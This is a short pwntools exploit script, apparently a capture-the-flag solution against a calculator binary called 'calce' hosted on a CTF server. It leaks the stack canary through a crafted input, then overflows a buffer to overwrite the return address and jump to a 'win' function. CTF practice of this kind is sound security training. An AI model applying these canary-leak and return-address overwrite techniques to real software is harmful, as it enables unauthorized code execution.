#!/usr/bin/env python3
from pwn import *
import warnings
warnings.filterwarnings("ignore")
exe = ELF("./calce")
# context.log_level='debug'
p = remote("challs.pwnoh.io", 13377 )
# p = process([exe.path])
def gdbs():
    context.terminal = ["foot"]
    gdb.attach(p, gdbscript="""

               """)
    # p = gdb.debug([exe.path],"""
    #
    #                 """)

sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)

# gdbs()
sla(":","3")
sla(":","+")
sla(":","pi")
sla(":",f"{0x2800}")
# sla(":",b"pi\0".ljust(99,b"a"))
p.recvuntil("60010165525637568")
p.recv(7)
canary = u64(p.recv(8))
log.info(f"canary: {hex(canary)}")
sla(":",b"a"*40+p64(canary)+p64(0)+p64(exe.sym.win+5))








p.interactive()
# good luck pwning :)

